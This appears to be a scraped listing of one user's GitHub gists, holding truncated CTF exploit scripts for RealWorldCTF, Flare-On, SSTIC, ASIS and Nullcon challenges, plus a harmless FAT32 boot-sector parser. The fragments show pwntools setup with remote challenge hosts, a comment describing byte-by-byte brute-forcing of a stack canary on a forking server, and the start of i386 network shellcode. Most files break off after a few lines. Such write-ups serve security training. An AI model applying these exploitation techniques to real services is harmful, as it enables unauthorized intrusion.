
dialluvioso / svme.py
Created January 23, 2022 13:59
Solution to SVME from RealWorldCTF
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
# Opcode numbers used by the exploit to assemble SVME bytecode.
# NOTE(review): the mnemonics are the conventional stack-VM names (pop, print,
# global store/load, integer constant, local store); the exact semantics and
# operand counts must be confirmed against the interpreter's dispatch table,
# not inferred from these names.
# Values left exactly as written (mixed hex/decimal: 9 == 0x09, 0xb == 0x0b).
POP = 0x0f
PRINT = 0x0e
GSTORE = 0x0d
ICONST = 9
GLOAD = 0xb
STORE = 0xc
dialluvioso / whomovedmyblock.py
Created January 23, 2022 13:57
Solution to Who Moved My Block from RealWorldCTF
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
# remote stack-based buffer overflow in `handle_info`
# since the architecture is a fork based model without execve(), every child
# inherits the parent's address space byte-for-byte: the stack canary and the
# ASLR bases are identical for every connection, and a crashed child does not
# bring the listening parent down, so wrong guesses can be retried indefinitely
# naive strategy is a linear probing using the response as an oracle: overwrite
# one byte past the buffer at a time and keep the value for which the service
# still replies normally (a wrong guess typically kills that child)
HOST = "47.242.113.232" # CTF infrastructure, long gone; for a local instance use "localhost" / 10809
PORT = 49240 # (local: 10809)
dialluvioso / wizardcult.py
Created October 24, 2021 19:53
Solution for the last flareon2021 challenge
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
table = [90, 132, 6, 69, 174, 203, 232, 243, 87, 254, 166, 61, 94, 65, 8, 208, 51, 34, 33, 129, 32, 221, 0, 160, 35, 175, 113, 4, 139, 245, 24, 29, 225, 15, 101, 9, 206, 66, 120, 62, 195, 55, 202, 143, 100, 50, 224, 172, 222, 145, 124, 42, 192, 7, 244, 149, 159, 64, 83, 229, 103, 182, 122, 82, 78, 63, 131, 75, 201, 130, 114, 46, 118, 28, 241, 30, 204, 183, 215, 199, 138, 16, 121, 26, 77, 25, 53, 22, 125, 67, 43, 205, 134, 171, 68, 146, 212, 14, 152, 20, 185, 155, 167, 36, 27, 60, 226, 58, 211, 240, 253, 79, 119, 209, 163, 12, 72, 128, 106, 218, 189, 216, 71, 91, 250, 150, 11, 236, 207, 73, 217, 17, 127, 177, 39, 231, 197, 178, 99, 230, 40, 54, 179, 93, 251, 220, 168, 112, 37, 246, 176, 156, 165, 95, 184, 57, 228, 133, 169, 252, 19, 2, 81, 48, 242, 105, 255, 116, 191, 89, 181, 70, 23, 194, 88, 97, 153, 235, 164, 158, 137, 238, 108, 239, 162, 144, 115, 140, 84, 188, 109, 219, 44, 214, 227, 161, 141, 80, 247, 52, 213, 249, 1, 123, 142, 190, 104, 107, 85,
# -*- coding: utf-8 -*-
from pwintools import *
filepath = "NtBabyHeap.exe"
def add(size):
io.recvuntil("Enter Choice:")
io.sendline("1")
io.recvuntil("Enter size:")
io.sendline("%d" % size)
dialluvioso / bootsector.py
Created June 17, 2021 10:18
FAT32 dissector for SSTIC 2021 CTF
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import struct
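def u8(x: bytes) -> int:
    """Decode exactly one byte as an unsigned little-endian integer.

    Raises struct.error if *x* is not exactly 1 byte long.  That strictness is
    desirable when dissecting an untrusted filesystem image: a short or
    oversized field is an error, not something to silently truncate or pad.
    """
    return struct.unpack("<B", x)[0]


def u16(x: bytes) -> int:
    """Decode exactly two bytes as an unsigned little-endian 16-bit integer.

    Raises struct.error if *x* is not exactly 2 bytes long.
    """
    return struct.unpack("<H", x)[0]


def u32(x: bytes) -> int:
    """Decode exactly four bytes as an unsigned little-endian 32-bit integer.

    Raises struct.error if *x* is not exactly 4 bytes long.
    """
    return struct.unpack("<I", x)[0]


# Byte offsets of BIOS Parameter Block fields within the boot sector
# (BPB_BytsPerSec at 11 and BPB_SecPerClus at 13 in the FAT specification).
OFFSET_BYTSPERSEC = 11
OFFSET_SECPERCLUS = 13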
dialluvioso / sstic-maze-exploit.py
Created June 17, 2021 10:12
Exploit for the maze challenge SSTIC 2021 CTF
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
local = False
if local:
HOST = "localhost"
PORT = 1337
else:
dialluvioso / auth.py
Created December 13, 2020 22:38
Exploit for auth challenge ASIS CTF 2020
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
HOST = "69.90.132.134"  # ASIS CTF 2020 infrastructure; almost certainly unreachable now, point at a local instance
PORT = 3317
LOCAL = False  # presumably selects a local process instead of the remote target -- its use is below the preview cutoff
#context.log_level = "debug"  # uncomment to dump every byte sent/received while tuning the exploit
#!/usr/bin/env python
from pwn import *
local = False  # presumably toggles process() vs remote(); the branch is below the preview cutoff
host = 'challenges.ka0labs.org'
port = 1341
elf = ELF('pokedex_nn2k18')  # the challenge binary (pwntools ELF gives symbol/section lookups)
libc = ELF('libc-2.27.so')  # must be the exact libc build the remote runs; any offsets taken from it are only valid for that build
#!/usr/bin/env python
from pwn import *
from base64 import b64encode
context.arch = 'i386'
shellcode = asm('''
push 0x66
pop eax
push ebx
dialluvioso / pwn300.py
Created February 11, 2018 14:45
Nullcon HackIM 2018 - Exploitation Question 2 (300 points)
from pwn import *
local = False  # True: debug against a local copy of the binary; False: the CTF endpoint (long dead)
binary = ELF('./pwn2-box.bin')
context.arch = 'amd64'  # the shellcode assembled below presumably relies on this to emit x86-64 code
# NOTE(review): path duplicated from `binary` above; `binary.path` would keep the two in sync
p = process('./pwn2-box.bin') if local else remote('35.170.14.27', 9002)
# Custom shellcode using allowed seccomp sandbox syscalls to communicate with the child process